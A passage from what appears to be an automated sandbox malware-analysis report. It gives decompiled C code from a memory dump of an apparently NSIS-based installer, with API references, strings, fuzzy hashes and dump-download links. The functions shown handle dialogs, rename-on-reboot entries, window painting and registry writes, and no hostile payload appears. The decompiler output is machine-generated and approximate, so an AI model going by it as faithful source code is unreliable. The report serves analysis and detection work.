									__eflags =  *0x40c014 - _t136; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x476a68);
						 *0x476a68 = _a12;
						L58:
						if( *0x461dcc == _t136 &&  *0x476a68 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x461dcc = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x004054a9
0x004054b7
0x004055f9
0x004055fd
0x00405601
0x00405606
0x00405608
0x00405613
0x0040561e
0x00405623
0x00405625
0x00405627
0x0040562a
0x0040562f
0x0040563d
0x0040564a
0x00405651
0x00405651
0x00405652
0x00405652
0x00405657
0x00405662
0x00405668
0x0040566a
0x0040566c
0x004056ac
0x004056b1
0x004056b6
0x004056b6
0x004056bb
0x004056c4
0x004056c6
0x004056cb
0x004056d1
0x004056d5
0x004056d5
0x004056da
0x004056e0
0x00000000
0x00000000
0x004056eb
0x004056f1
0x00000000
0x00000000
0x004056fa
0x00405702
0x00405707
0x0040570a
0x00405710
0x00405715
0x00405718
0x0040571e
0x00405723
0x00405726
0x0040572c
0x00405734
0x0040573a
0x0040573e
0x00405744
0x0040574c
0x0040574c
0x0040574c
0x00405756
0x00405768
0x00405774
0x00405779
0x00405783
0x00405789
0x0040578b
0x00405790
0x0040578d
0x0040578d
0x0040578d
0x004057a0
0x004057b8
0x004057ba
0x004057c0
0x004057d5
0x004057c2
0x004057cb
0x004057cd
0x004057cd
0x004057db
0x004057ea
0x004057eb
0x00405801
0x00405808
0x0040580e
0x00405812
0x00405817
0x00405819
0x00000000
0x0040581f
0x0040581f
0x00405821
0x00000000
0x00000000
0x00405827
0x0040582b
0x00405850
0x00405856
0x0040585c
0x0040585e
0x00000000
0x00000000
0x00405884
0x0040588a
0x0040588f
0x00405891
0x00000000
0x00000000
0x00405897
0x0040589a
0x0040589d
0x004058b4
0x004058c0
0x004058d9
0x004058df
0x004058e3
0x004058e8
0x004058ee
0x00000000
0x00000000
0x004058f8
0x00405903
0x00000000
0x00405903
0x0040582d
0x00405833
0x00000000
0x00000000
0x00405839
0x0040583f
0x00000000
0x00000000
0x00000000
0x00405845
0x00405819
0x00405910
0x0040591c
0x00405923
0x00000000
0x0040566e
0x0040566e
0x00405671
0x004056a4
0x004056a4
0x004056a6
0x00000000
0x00000000
0x00000000
0x004056a6
0x00405673
0x00405677
0x0040567c
0x0040567e
0x00000000
0x00000000
0x0040568e
0x00405696
0x00000000
0x0040569c
0x004054c9
0x004054c9
0x004054cd
0x004054d2
0x004054e1
0x004054e1
0x004054ea
0x004054f3
0x004054fe
0x004054fe
0x0040550a
0x00405526
0x00405529
0x0040553c
0x00405542
0x004055e5
0x00000000
0x004055ef
0x00405548
0x00405555
0x00405557
0x00405559
0x00405578
0x00405578
0x0040557b
0x00405580
0x00405583
0x00405593
0x00405594
0x00405596
0x004055cc
0x004055df
0x00000000
0x004055df
0x00405598
0x0040559e
0x004055b7
0x004055bc
0x004055be
0x00000000
0x00000000
0x004055c0
0x004055ac
0x004055ac
0x004055ae
0x004055ae
0x00000000
0x004055ae
0x004055a1
0x004055a6
0x00000000
0x004055a6
0x00405585
0x0040558b
0x00000000
0x00000000
0x0040558d
0x00000000
0x0040558d
0x0040557d
0x00000000
0x0040557d
0x00405563
0x0040556a
0x00405570
0x00405572
0x00000000
0x00000000
0x00000000
0x00405572
0x0040552e
0x00000000
0x0040550c
0x00405512
0x0040551c
0x00405929
0x0040592f
0x0040593c
0x00405942
0x00405942
0x0040594c
0x00000000
0x0040594c
0x0040550a

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32 ref: 0040552E
GetDlgItem.USER32 ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32 ref: 00405619
GetDlgItem.USER32 ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32 ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
EnableWindow.USER32(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32 ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Uniqueness

Uniqueness Score: -1.00%

Function 004040E4, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004040E4(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				short* _v20;
				intOrPtr _v24;
				void* _v28;
				struct HWND__* _t61;
				signed int _t79;
				signed short* _t80;
				signed short* _t81;
				long _t94;
				intOrPtr _t105;
				signed char _t112;
				intOrPtr _t116;
				WCHAR* _t117;
				intOrPtr _t119;
				WCHAR* _t120;
				struct HWND__* _t121;

				_v12 = 0;
				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L14:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x461dc4 =  *0x461dc4 + 1;
							}
							L28:
							_t117 = _a16;
							L29:
							return E00403DF6(_a8, _a12, _t117);
						}
						_t61 = GetDlgItem(_a4, 0x3e8);
						_t117 = _a16;
						if( *((intOrPtr*)(_t117 + 8)) == 0x70b &&  *((intOrPtr*)(_t117 + 0xc)) == 0x201) {
							_t105 =  *((intOrPtr*)(_t117 + 0x1c));
							_t116 =  *((intOrPtr*)(_t117 + 0x18));
							_v24 = _t105;
							_v28 = _t116;
							_v20 = 0x46e220;
							if(_t105 - _t116 < 0x8010) {
								SendMessageW(_t61, 0x44b, 0,  &_v28);
								SetCursor(LoadCursorW(0, 0x7f02));
								ShellExecuteW(_a4, L"open", _v20, 0, 0, 1);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t117 = _a16;
							}
						}
						if( *((intOrPtr*)(_t117 + 8)) != 0x700 ||  *((intOrPtr*)(_t117 + 0xc)) != 0x100) {
							goto L29;
						} else {
							if( *((intOrPtr*)(_t117 + 0x10)) == 0xd) {
								SendMessageW( *0x47eab4, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t117 + 0x10)) == 0x1b) {
								SendMessageW( *0x47eab4, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x461dc4 != 0) {
						goto L28;
					} else {
						_t119 =  *0x461db8;
						if(( *(_t119 + 0x14) & 0x00000020) == 0) {
							goto L28;
						}
						 *(_t119 + 0x14) =  *(_t119 + 0x14) & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DB1(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00403D8D();
						goto L14;
					}
				}
				_t120 = _a16;
				_t79 =  *(_t120 + 0x30);
				if(_t79 < 0) {
					_t79 =  *( *0x476a88 - 4 + _t79 * 4);
				}
				_t80 =  *0x47ead8 + _t79 * 2;
				_t112 =  *_t80 & 0x0000ffff;
				_t81 =  &(_t80[1]);
				_a8 = _t112;
				 *0x461dbc = 0;
				_a16 = _t81;
				if((_t112 & 0x00000010) == 0) {
					_v8 = E00404039;
					_t81 = E00403FF6(_t81);
					 *0x441d60 = 1;
				} else {
					_v8 = E004040A3;
				}
				_push( *((intOrPtr*)(_t120 + 0x34)));
				_v16 = _t81;
				_push(0x22);
				E00403D6B(_a4);
				_push( *((intOrPtr*)(_t120 + 0x38)));
				_push(0x23);
				E00403D6B(_a4);
				CheckDlgButton(_a4, (0 | (( !( *(_t120 + 0x14) >> 5) |  *(_t120 + 0x14)) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DB1(( !( *(_t120 + 0x14) >> 5) |  *(_t120 + 0x14)) & 0x00000001);
				_t121 = GetDlgItem(_a4, 0x3e8);
				E00403DC4(_t121);
				SendMessageW(_t121, 0x45b, 1, 0);
				_t94 =  *( *0x47eabc + 0x68);
				if(_t94 < 0) {
					_t94 = GetSysColor( ~_t94);
				}
				SendMessageW(_t121, 0x443, 0, _t94);
				SendMessageW(_t121, 0x445, 0, 0x4010000);
				 *0x441d50 = 0;
				SendMessageW(_t121, 0x435, 0, lstrlenW(_a16));
				SendMessageW(_t121, 0x449, _a8,  &_v16);
				 *0x461dc4 = 0;
				return 0;
			}

0x004040f6
0x004040f9
0x0040423a
0x00404298
0x0040429c
0x00404371
0x00404373
0x00404373
0x00404379
0x00404379
0x0040437c
0x00000000
0x00404383
0x004042aa
0x004042b0
0x004042ba
0x004042c5
0x004042c8
0x004042cb
0x004042d0
0x004042d3
0x004042e0
0x004042ed
0x004042fe
0x00404313
0x00404322
0x00404328
0x00404328
0x004042e0
0x00404332
0x00000000
0x0040433d
0x00404341
0x00404351
0x00404351
0x00404357
0x00404363
0x00404363
0x00000000
0x00404367
0x00404332
0x00404245
0x00000000
0x00404257
0x00404257
0x00404261
0x00000000
0x00000000
0x0040428b
0x0040428e
0x00404293
0x00000000
0x00404293
0x00404245
0x004040ff
0x00404102
0x00404107
0x00404118
0x00404118
0x00404120
0x00404123
0x00404126
0x00404129
0x0040412c
0x00404132
0x00404138
0x00404144
0x0040414b
0x00404151
0x0040413a
0x0040413a
0x0040413a
0x0040415b
0x0040415e
0x0040416b
0x00404175
0x0040417a
0x0040417d
0x00404182
0x00404199
0x004041a0
0x004041b3
0x004041b6
0x004041ca
0x004041d1
0x004041d6
0x004041db
0x004041db
0x004041e9
0x004041f7
0x004041fc
0x0040420f
0x0040421e
0x00404220
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32 ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32 ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32 ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
F, xrefs: 004042D3
N, xrefs: 00404298

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406AC5, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406AC5() {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t20;
				int _t21;
				long _t33;
				void* _t40;
				void* _t41;
				int _t48;
				void* _t49;
				intOrPtr* _t50;
				WCHAR* _t52;
				long _t54;
				void* _t58;
				struct _OVERLAPPED* _t59;
				void* _t60;
				void* _t62;
				void* _t63;

				lstrcpyW(0x465e20, L"NUL");
				_t52 =  *(_t62 + 0x1c);
				_t59 = 0;
				if(_t52 == 0) {
					L3:
					_t20 = GetShortPathNameW( *(_t62 + 0x20), 0x46b478, 0x400);
					if(_t20 != _t59 && _t20 <= 0x400) {
						_t20 = WideCharToMultiByte(_t59, _t59, 0x465e20, 0xffffffff, 0x466620, 0x400, _t59, _t59);
						if(_t20 != 0) {
							_t20 = WideCharToMultiByte(_t59, _t59, 0x46b478, 0xffffffff, 0x466c70, 0x400, _t59, _t59);
							if(_t20 != 0) {
								_t21 = wsprintfA(0x467070, "%s=%s\r\n", 0x466620, 0x466c70);
								_t63 = _t62 + 0x10;
								_t48 = _t21;
								E00406831(_t48, 0x46b478, 0x466c70, 0x46b478,  *((intOrPtr*)( *0x47eabc + 0x128)));
								_t20 = E00405E7C(0x46b478, 0xc0000000, 4);
								 *(_t63 + 0x1c) = _t20;
								if(_t20 != 0xffffffff) {
									_t54 = GetFileSize(_t20, _t59);
									_t6 = _t48 + 0xa; // 0xa
									_t58 = GlobalAlloc(0x40, _t54 + _t6);
									if(_t58 == _t59 || ReadFile( *(_t63 + 0x2c), _t58, _t54, _t63 + 0x14, _t59) == 0 || _t54 !=  *((intOrPtr*)(_t63 + 0x10))) {
										L21:
										return CloseHandle( *(_t63 + 0x1c));
									} else {
										if(E00405DE2(_t49, _t58, "[Rename]\r\n") != _t59) {
											_t60 = E00405DE2(_t49, _t30 + 0xa, "\n[");
											if(_t60 == 0) {
												_t59 = 0;
												L19:
												_t33 = _t54;
												L20:
												E00405E38(_t58 + _t33, 0x467070, _t48);
												SetFilePointer( *(_t63 + 0x28), _t59, _t59, _t59);
												WriteFile( *(_t63 + 0x2c), _t58, _t54 + _t48, _t63 + 0x14, _t59);
												GlobalFree(_t58);
												goto L21;
											}
											_t50 = _t58 + _t54;
											_t40 = _t50 + _t48;
											if(_t50 <= _t60) {
												L17:
												_t14 = _t60 - _t58 + 1; // 0x1
												_t33 = _t14;
												_t59 = 0;
												goto L20;
											}
											_t41 = _t40 - _t50;
											do {
												 *((char*)(_t41 + _t50)) =  *_t50;
												_t50 = _t50 - 1;
											} while (_t50 > _t60);
											goto L17;
										}
										lstrcpyA(_t58 + _t54, "[Rename]\r\n");
										_t54 = _t54 + 0xa;
										goto L19;
									}
								}
							}
						}
					}
				} else {
					CloseHandle(E00405E7C(_t52, 0, 1));
					_t20 = GetShortPathNameW(_t52, 0x465e20, 0x400);
					if(_t20 != 0 && _t20 <= 0x400) {
						goto L3;
					}
				}
				return _t20;
			}

0x00406ad5
0x00406adb
0x00406adf
0x00406ae8
0x00406b13
0x00406b1e
0x00406b26
0x00406b47
0x00406b4b
0x00406b5f
0x00406b63
0x00406b79
0x00406b7f
0x00406b82
0x00406b90
0x00406b9d
0x00406ba2
0x00406ba9
0x00406bb7
0x00406bb9
0x00406bc6
0x00406bca
0x00406c84
0x00000000
0x00406bf4
0x00406c01
0x00406c25
0x00406c29
0x00406c4a
0x00406c4c
0x00406c4c
0x00406c4e
0x00406c57
0x00406c63
0x00406c77
0x00406c7e
0x00000000
0x00406c7e
0x00406c2b
0x00406c2e
0x00406c33
0x00406c41
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00406c46
0x00406c35
0x00406c37
0x00406c39
0x00406c3c
0x00406c3d
0x00000000
0x00406c37
0x00406c0c
0x00406c12
0x00000000
0x00406c12
0x00406bca
0x00406ba9
0x00406b63
0x00406b4b
0x00406aea
0x00406af4
0x00406afd
0x00406b05
0x00000000
0x00000000
0x00406b05
0x00406c93

APIs

lstrcpyW.KERNEL32 ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32 ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32 ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32 ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

[Rename], xrefs: 00406BF4, 00406C03
NUL, xrefs: 00406ACA
%s=%s, xrefs: 00406B6F
^F, xrefs: 00406ACF
plF, xrefs: 00406B54

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, signed int _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t72;
				struct HBRUSH__* _t92;
				struct HFONT__* _t99;
				long _t107;
				signed int _t113;
				signed int _t129;
				struct HDC__* _t131;
				intOrPtr _t133;

				if(_a8 == 0xf) {
					_t133 =  *0x47eabc;
					_t72 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t72;
					GetClientRect(_a4,  &_v32);
					_t129 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t129) {
						_t113 = _t129 - _v32.top;
						asm("cdq");
						_a12 = _t113;
						_a16 = ((( *(_t133 + 0x52) & 0x000000ff) * _t113 + ( *(_t133 + 0x56) & 0x000000ff) * _v32.top) / _t129 & 0x000000ff) << 8;
						asm("cdq");
						asm("cdq");
						_v16.lbColor = (_a16 | (( *(_t133 + 0x51) & 0x000000ff) * _t113 + ( *(_t133 + 0x55) & 0x000000ff) * _v32.top) / _t129 & 0x000000ff) << 0x00000008 | (( *(_t133 + 0x50) & 0x000000ff) * _a12 + ( *(_t133 + 0x54) & 0x000000ff) * _v32.top) / _t129 & 0x000000ff;
						_t92 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t92;
						FillRect(_a8,  &_v32, _t92);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t133 + 0x58) != 0xffffffff) {
						_t99 = CreateFontIndirectW( *(_t133 + 0x34));
						_a16 = _t99;
						if(_t99 != 0) {
							_t131 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t131, 1);
							SetTextColor(_t131,  *(_t133 + 0x58));
							_a8 = SelectObject(_t131, _a16);
							DrawTextW(_t131, 0x476aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t131, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t107 = _a16;
				if(_a8 == 0x46) {
					 *(_t107 + 0x18) =  *(_t107 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t107 + 4)) =  *0x47eab4;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t107);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010fc
0x00401081
0x00401089
0x0040108c
0x00401095
0x004010a9
0x004010c6
0x004010d5
0x004010d8
0x004010de
0x004010e3
0x004010ed
0x004010f6
0x004010f8
0x004010f8
0x00401109
0x0040110e
0x00401114
0x00401119
0x0040111b
0x00401121
0x00401128
0x0040112f
0x00401139
0x00401150
0x0040115f
0x00401169
0x0040116e
0x0040116e
0x00401119
0x00401177
0x00000000
0x00401181
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32 ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402880, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00402880(int __ebx, void* __edx) {
				intOrPtr _t49;
				char _t65;
				int _t68;
				int _t72;
				void* _t74;
				void* _t77;
				int _t83;
				void* _t84;
				void* _t86;

				_t75 = __edx;
				_t72 = __ebx;
				if(__edx == __ebx) {
					_t77 =  *0x47eb64 + 0x80000001;
				}
				 *((intOrPtr*)(_t84 - 0x10)) =  *((intOrPtr*)(_t84 - 0x1c));
				 *(_t84 - 0x14) =  *(_t84 - 0x18);
				 *(_t84 - 0xc) = E0040145C(_t75, 2);
				 *(_t84 + 8) = E0040145C(_t75, 0x11);
				_t49 = E004061EC(_t77);
				_pop(_t74);
				 *((intOrPtr*)(_t84 - 0x34)) = _t49;
				 *(_t84 - 4) = 1;
				if(RegCreateKeyExW(_t77,  *(_t84 + 8), _t72, _t72, _t72,  *0x47eb90 | 0x00000002, _t72, _t84 - 0x44, _t72) != 0) {
					_push( *(_t84 + 8));
					_push( *((intOrPtr*)(_t84 - 0x34)));
					_push(L"WriteReg: error creating key \"%s\\%s\"");
					E004062CF();
				} else {
					 *(_t84 - 8) = _t72;
					if( *((intOrPtr*)(_t84 - 0x10)) != 1) {
						L10:
						_t83 = 4;
						if( *((intOrPtr*)(_t84 - 0x10)) == _t83) {
							_t74 = 3;
							_t65 = E00401446(_t74);
							_push(_t65);
							_push( *(_t84 - 0xc));
							 *0x4140f8 = _t65;
							_push( *(_t84 + 8));
							 *(_t84 - 8) = _t83;
							E004062CF(L"WriteRegDWORD: \"%s\\%s\" \"%s\"=\"0x%08x\"",  *((intOrPtr*)(_t84 - 0x34)));
							_t86 = _t86 + 0x14;
						}
						if( *((intOrPtr*)(_t84 - 0x10)) == 3) {
							 *(_t84 - 8) = E0040337F( *((intOrPtr*)(_t84 - 0x20)), _t72, 0x4140f8, 0xc018);
							E00406250(_t74, _t84 - 0x15c, 0x100, 0x4140f8, _t60);
							_push(_t84 - 0x15c);
							_push( *(_t84 - 0xc));
							_push( *(_t84 + 8));
							E004062CF(L"WriteRegBin: \"%s\\%s\" \"%s\"=\"%s\"",  *((intOrPtr*)(_t84 - 0x34)));
							_t86 = _t86 + 0x24;
						}
					} else {
						E0040145C(_t75, 0x23);
						_t68 = lstrlenW(0x4140f8);
						_push(0x4140f8);
						_push( *(_t84 - 0xc));
